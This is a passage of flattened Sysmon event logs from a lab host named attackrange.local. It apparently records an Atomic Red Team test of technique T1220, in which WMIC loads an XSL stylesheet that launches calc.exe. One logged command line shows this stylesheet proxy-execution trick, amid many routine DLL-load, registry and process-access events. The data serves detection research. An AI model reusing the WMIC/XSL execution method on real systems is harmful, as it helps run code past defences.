12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 12241200x800000000000000057349007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.957{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057349005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057349004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057349003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057349002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057349001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057349000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXEMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EAtrueMicrosoft WindowsValid 10341000x800000000000000057348999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-886B-6164-0A00-00000000F101}6408016C:\Windows\system32\services.exe{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x800000000000000057348996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.940{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k wsappxC:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7{8B6011A9-886B-6164-0A00-00000000F101}640C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x800000000000000057348995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-59F3-04000000F101}46565640C:\Windows\System32\Wbem\WMIC.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+89d2f|C:\Windows\System32\windows.storage.dll+899a5|C:\Windows\System32\windows.storage.dll+89496|C:\Windows\System32\windows.storage.dll+8a908|C:\Windows\System32\windows.storage.dll+892be|C:\Windows\System32\windows.storage.dll+8c0d5|C:\Windows\System32\windows.storage.dll+8c454|C:\Windows\System32\windows.storage.dll+8ba90|C:\Windows\System32\SHELL32.dll+3cd3f|C:\Windows\System32\SHELL32.dll+3cbcc|C:\Windows\System32\SHELL32.dll+dcb6e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057348994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.958{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exewmic process list /FORMAT:"C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl" 12241200x800000000000000057348993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x800000000000000057348992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 12241200x800000000000000057348991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 734700x800000000000000057348986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\AppXDeploymentClient.dll10.0.14393.4169 (rs1_release.210107-1130)AppX Deployment Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationAppXDeploymentClient.dllMD5=34A42B1D3715F325F311010834280A12,SHA256=B94944CD1B3F960AA610E7A758032BDE743260391471A6EB35894DAA57D76ADEtrueMicrosoft WindowsValid 12241200x800000000000000057348985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.942{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.941{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.937{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-886B-6164-0A00-00000000F101}640C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.937{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.937{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.937{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-886B-6164-0A00-00000000F101}640C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057348962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.936{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057348959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 